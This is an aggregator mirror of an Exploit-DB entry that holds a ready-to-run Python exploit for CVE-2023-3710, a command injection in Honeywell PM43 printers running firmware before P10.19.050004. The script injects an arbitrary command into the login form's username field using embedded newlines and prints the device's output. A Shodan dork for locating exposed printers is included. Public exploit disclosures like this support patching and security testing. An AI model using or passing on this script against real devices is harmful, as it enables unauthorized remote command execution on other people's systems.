1
[remote] Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51885
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710
import requests
import argparse
BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'
def banner():
banner = """
╔════════════════════════════════════════════════╗
CVE-2023-3710
Command Injection in Honeywell PM43 Printers
Author: ByteHunter
╚════════════════════════════════════════════════╝
"""
print(YELLOW + banner + RESET)
def run_command(url, command):
full_url = f"{url}/loadfile.lp?pageid=Configure"
payload = {
'username': f'hunt\n{command}\n',
'userpassword': 'admin12345admin!!'
}
try:
response = requests.post(full_url, data=payload, verify=False)
response_text = response.text
html_start_index = response_text.find('<html>')
if html_start_index != -1:
return response_text[:html_start_index]
else:
return response_text
except requests.exceptions.RequestException as e:
return f"Error: {e}"
def main():
parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
parser.add_argument('--url', dest='url', help='Target URL', required=True)
parser.add_argument('--run', dest='command', help='Command to execute', required=True)
args = parser.parse_args()
response = run_command(args.url, args.command)
print(f"{BLUE}{response}{RESET}")
if __name__ == "__main__":
banner()
main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK